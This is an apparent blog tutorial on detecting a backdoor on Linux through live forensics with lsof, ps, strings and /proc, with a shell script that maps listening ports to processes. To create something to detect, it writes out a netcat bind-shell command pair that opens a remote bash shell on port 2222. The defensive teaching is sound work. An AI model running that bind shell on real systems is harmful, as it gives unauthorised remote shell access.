In this blog post, I will give an introduction to live forensics on a Linux machine using only default command line tools. If you wish to do the same on a Windows machine, I have got you covered: Endpoint Live Forensics from the Command Line on Windows. This blog post is heavily inspired by the 16-hour seminar “SOC Core Skills” by John Strand (Black Hills Information Security).
In order to understand the following steps, we need to know that on Linux everything is a file, even processes. Today, we will look into /proc, a virtual filesystem that contains one directory per running process. Each process directory holds virtual files describing that process (its executable, its command line, its open file descriptors and more). Spoiler alert: we are going to analyze one of those files.
Create a backdoor and connect to it
Let’s start by setting up a malicious process on the Linux system. Firstly, we create a backdoor with netcat from a terminal tab and connect back to it from a second tab.
Terminal tab 1:
mknod backpipe p
/bin/bash 0<backpipe | nc -l 2222 1>backpipe
The first command creates a named pipe (a FIFO) called backpipe, whereas the second one starts a netcat listener on port 2222 that writes everything it receives from the network into the backpipe, from which the bash session reads its standard input. The output of the bash session is piped back into the netcat listener, which sends it to the connected client. Wait what? At first, I couldn’t visualize what this command did – yes, vision is strong with this one, so I played with it. The screenshot below visualizes how this backdoor works. Note that the listener syntax depends on the netcat flavour installed: OpenBSD netcat accepts nc -l 2222, whereas netcat-traditional expects nc -l -p 2222.
Terminal tab 2:
nc 127.0.0.1 2222
In real life, you would use the IP address of the target machine instead of 127.0.0.1. The loopback address works here only because the attacker and the victim machine are one and the same.
Run analysis from the command line with default tools
Now everything is set up for the analysis. We open a third terminal tab, switch to root (other users’ process details under /proc are not readable otherwise), and list all open network connections with
lsof -i -P [1]
This list shows two processes. PID 157 is the netcat listener running our backdoor (user: root), whereas PID 158 is the client connected to it, that is, the netcat we launched from the second tab (user: adhd). In a real-world situation we would see only the listener and the established connection on port 2222 coming from the attacker’s IP; the client side (PID 158 here) would live on the attacker’s machine. Next, we investigate PID 157 further by running
lsof -p 157.
This command lists all open files associated with this process. We can see that there is a named pipe [2] called backpipe in the root folder and that netcat is running from the bin directory. This is the first indication that netcat is currently running on the system. We can now go a step further and list the command line that started these processes with
ps aux [3]
The output of this command shows that there is a backdoor running on port 2222. From here, we take the last step and analyze the executable behind process 157, which /proc exposes as /proc/157/exe. We do this with the tool
strings [4], which confirms our suspicion that netcat is running as PID 157.
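The same triage done by hand against /proc, as an added example that is not part of the original post. lsof, ps and strings are front-ends to /proc; the script below uses only /proc and coreutils, which is useful on a host where lsof or binutils are missing. It reads LISTEN sockets from /proc/net/tcp (ports there are hex, so 2222 shows up as 08AE), maps the socket inode to the PID holding it via /proc/<pid>/fd, and then dumps exe, cwd, cmdline, open file descriptors and the printable strings of /proc/<pid>/exe. The /proc/net/tcp sample embedded in the script is constructed for the demo; the function names are my own. Run it as root to see other users’ processes; IPv6 listeners sit in /proc/net/tcp6 with the same layout.

```shell
#!/bin/sh
# Added example: live triage of a listening port using only /proc and coreutils.
# Function names (tcp_listeners, pid_for_socket_inode, proc_triage) are my own.

# Print "port inode" for every socket in LISTEN state (st == 0A) from a file in
# /proc/net/tcp format. local_address is hex "ADDR:PORT"; the inode is column 10.
tcp_listeners() {
    tail -n +2 "$1" | while read -r _sl laddr _raddr st _q _tm _rt _uid _to inode _rest; do
        [ "$st" = "0A" ] || continue
        printf '%d %s\n' "0x${laddr#*:}" "$inode"
    done
}

# Find the PID whose fd table contains socket:[inode]. Other users' fd tables
# are only readable as root, which is why the post switches to root first.
pid_for_socket_inode() {
    for fd in /proc/[0-9]*/fd/*; do
        [ "$(readlink "$fd" 2>/dev/null)" = "socket:[$1]" ] || continue
        p=${fd#/proc/}
        echo "${p%%/*}"
        return 0
    done
    return 1
}

# The command line that started a process, NUL separators turned into spaces
# (this is what ps aux shows in its COMMAND column).
proc_cmdline() {
    tr '\0' ' ' < "/proc/$1/cmdline"
}

# Everything the post gathered with lsof -p, ps aux and strings, read from /proc.
proc_triage() {
    pid=$1
    echo "exe:     $(readlink "/proc/$pid/exe")"   # the binary actually running
    echo "cwd:     $(readlink "/proc/$pid/cwd")"
    echo "cmdline: $(proc_cmdline "$pid")"
    echo "open fds:"                               # a FIFO such as backpipe shows up as an fd target here
    ls -l "/proc/$pid/fd" 2>/dev/null | tail -n +2
    echo "printable strings in exe (first 20 of length >= 8):"
    tr -c '[:print:]' '\n' < "/proc/$pid/exe" | grep -E '^.{8,}$' | head -n 20
}

# Constructed /proc/net/tcp sample: a listener on 0x08AE = 2222 (state 0A)
# and an established connection (state 01) that must be ignored.
SAMPLE=$(mktemp)
cat > "$SAMPLE" <<'EOF'
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:08AE 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 12345 1 0000000000000000 100 0 0 10 0
   1: 0100007F:08AE 0100007F:A2F4 01 00000000:00000000 00:00000000 00000000     0        0 12346 1 0000000000000000 20 4 30 10 -1
EOF
echo "listeners in sample: $(tcp_listeners "$SAMPLE")"   # 2222 12345

# Live run: triage every listener on this host that we are allowed to see.
tcp_listeners /proc/net/tcp 2>/dev/null | while read -r port inode; do
    if pid=$(pid_for_socket_inode "$inode"); then
        echo "== port $port is held by PID $pid =="
        proc_triage "$pid"
    else
        echo "== port $port: owning process not visible (run as root) =="
    fi
done
```

With the backdoor from above running, the live run prints the block for port 2222 with exe resolving to the netcat binary and an fd pointing at the backpipe FIFO, which is the same evidence lsof, ps and strings gave us, but without depending on those tools being present on the compromised host.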
All in all, we were able to detect a fishy connection, find the PID behind it, list the command that invoked the corresponding process and analyze its executable using Linux built-in tools only.
I hope you liked this post. If you have any questions, feel free to leave a comment in the comment section. Never stop learning!
[1] lsof lists all open files.
    -i selects IPv4 and IPv6 network files, that is, the TCP and UDP sockets.
    -P tells lsof not to convert port numbers to service names.
[2] FIFO files are named pipes that are accessed as part of the file system.
[3] ps aux: a lists all processes with a TTY, u adds the user ID or name, x also lists processes without a controlling TTY.
[4] strings is a tool that displays the printable strings in a file.